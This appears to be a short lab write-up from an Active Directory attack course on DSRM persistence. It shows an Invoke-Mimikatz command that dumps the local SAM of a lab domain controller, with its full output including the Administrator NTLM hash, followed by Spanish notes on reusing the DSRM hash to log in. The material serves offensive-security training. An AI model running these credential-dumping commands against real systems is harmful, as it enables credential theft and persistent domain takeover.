Learning Objective - 11
DSRM
PS C:\AD\Tools> Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dcorp-dc
.#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
620 {0;000003e7} 1 D 18290 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;0898d047} 0 D 144233195 dcorp\Administrator S-1-5-21-719815819-3726368948-3917688648-500 (12g,26p) Primary
* Thread Token : {0;000003e7} 1 D 144330074 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(powershell) # lsadump::sam
Domain : DCORP-DC
SysKey : bab78acd91795c983aef0534e0db38c7
Local SID : S-1-5-21-627273635-3076012327-2140009870
SAMKey : f3a9473cb084668dcf1d7e5f47562659
RID : 000001f4 (500)
User : Administrator
Hash NTLM: a102ad5753f4c441e3af31c97fad86fd
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Ejecutamos los siguientes comandos para que la clave use el hash del DSRM
Ahora nos logeamos con la hash del DSRM.
En la nueva terminar podemos evidenciar el permiso para logeo.
Last updated